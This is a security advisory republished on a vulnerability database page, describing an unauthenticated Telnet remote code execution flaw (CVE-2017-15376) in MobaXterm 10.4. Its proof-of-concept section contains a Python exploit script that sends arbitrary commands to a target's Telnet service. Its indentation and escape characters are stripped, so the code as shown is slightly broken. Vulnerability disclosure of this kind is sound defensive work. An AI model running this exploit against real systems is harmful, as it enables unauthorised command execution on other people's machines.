| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| Mobatek MobaXterm TELNET Service Arbitrary Command Execution Vulnerability | 20 Oct 201700:00 | – | cnvd | |
| CVE-2017-15376 | 16 Oct 201704:00 | – | cve | |
| CVE-2017-15376 | 16 Oct 201704:00 | – | cvelist | |
| EUVD-2017-6829 | 7 Oct 202500:30 | – | euvd | |
| Mobatek MobaXterm 10.4 (CVE-2017-15376) | 15 Mar 202400:00 | – | nessus | |
| CVE-2017-15376 | 16 Oct 201704:29 | – | nvd | |
| Authentication flaw | 16 Oct 201704:29 | – | prion | |
| CVE-2017-15376 | 22 May 202507:21 | – | redhatcve | |
| MobaXtrem v10.4 - Remote Code Execution Vulnerability | 18 Sep 201700:00 | – | vulnerlab |
Document Title:
===============
MobaXtrem v10.4 - Remote Code Execution Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2097
Video: https://www.youtube.com/watch?v=FtBGmwFtRrE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15376
CVE-ID:
=======
CVE-2017-15376
Release Date:
=============
2017-09-17
Vulnerability Laboratory ID (VL-ID):
====================================
2097
Common Vulnerability Scoring System:
====================================
6.5
Vulnerability Class:
====================
Code Execution
Current Estimated Price:
========================
3.000€ - 4.000€
Product & Service Introduction:
===============================
We have been creating system and network software since 2008 for worldwide users. Mobatek develops high value products in
order to provide efficient and cost effective solutions for your IT, development and DBA teams. Our products are designed
to ensure high security, efficiency and focused on user experience. No headache for deployment: our products do not require
any dependency, Internet connection or third-party software to run.
(Copy of the Homepage: http://www.mobatek.net/ )
(Source: http://download.mobatek.net/10420170816103227/MobaXterm_Portable_v10.4.zip )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a remote code execution vulnerability in the official MobaXtrem v10.4 software.
Vulnerability Disclosure Timeline:
==================================
2017-09-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Mobatek
Product: MobaXtrem - Software 10.4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A remote code execution vulnerability has been discovered in the official MobaXtrem v10.4 software.
The vulnerability allows remote attackers to unauthorized execute malicious codes to compromise the targeted computer system.
Telnet service doesn't authenticate for a remote conncection which allows attacker to pass malicious commands over
victims computer system through the basic protocol.
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by local and remote attackers without user interaction or privileged user accounts.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
import telnetlib,sys
print """
Exploit => MobaXtrem 10.4 Remote Code Execution
Discoverer => Sultan Albalawi
"""
def get_set(HOST,cmd):
try :
tn = telnetlib.Telnet(HOST)
bg="x63x79x67x73x74x61x72x74"
tn.write(bg+" ./"+cmd+"n")
tn.write(main())
tn.read_all()
except KeyboardInterrupt:
print "[-] Execution stopped ... keyboard interrupt raised"
except Exception as e:
pass
def main():
if len(sys.argv)==2:
HOST = sys.argv[1]
cmd = str(raw_input("cmd> "))
if "exit" in cmd :
sys.exit("exiting...")
else:
print"Executing => %s"%cmd
get_set(HOST,cmd)
else:
print "Usage: ./"+sys.argv[0]+" <target_ip>"
if __name__ == '__main__':
main()
Security Risk:
==============
The security risk of the remote code execution vulnerability in the software is estimated as high (CVSS).
Credits & Authors:
==================
Sultan Albalawi [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Sultan+Albalawi
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation